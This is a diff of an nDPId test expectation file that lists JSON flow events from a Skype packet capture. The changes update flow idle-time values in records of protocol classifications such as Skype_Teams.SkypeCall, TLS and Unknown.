-00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970684583,"flow_last_seen":1431970693811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":391,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970661447,"flow_last_seen":1431970679053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":500,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970661447,"flow_last_seen":1431970679053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":500,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970684583,"flow_last_seen":1431970693811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":391,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1431970684583,"flow_last_seen":1431970693811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":391,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -1208,14 +1208,14 @@ 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970701461,"flow_last_seen":1431970708429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970701461,"flow_last_seen":1431970708429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431970703073,"flow_last_seen":1431970706415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10758,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431970703073,"flow_last_seen":1431970706415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10758,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970707102,"flow_last_seen":1431970708204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970707102,"flow_last_seen":1431970708204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970701461,"flow_last_seen":1431970708429,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970701461,"flow_last_seen":1431970708429,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431970703073,"flow_last_seen":1431970706415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10758,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1431970703073,"flow_last_seen":1431970706415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10758,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970707102,"flow_last_seen":1431970708204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970707102,"flow_last_seen":1431970708204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634728,"flow_last_seen":1431970661287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -1238,8 +1238,8 @@ 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970687670,"flow_last_seen":1431970700698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970687670,"flow_last_seen":1431970700698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970687670,"flow_last_seen":1431970700698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970687670,"flow_last_seen":1431970700698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51288,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -1254,8 +1254,8 @@ 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 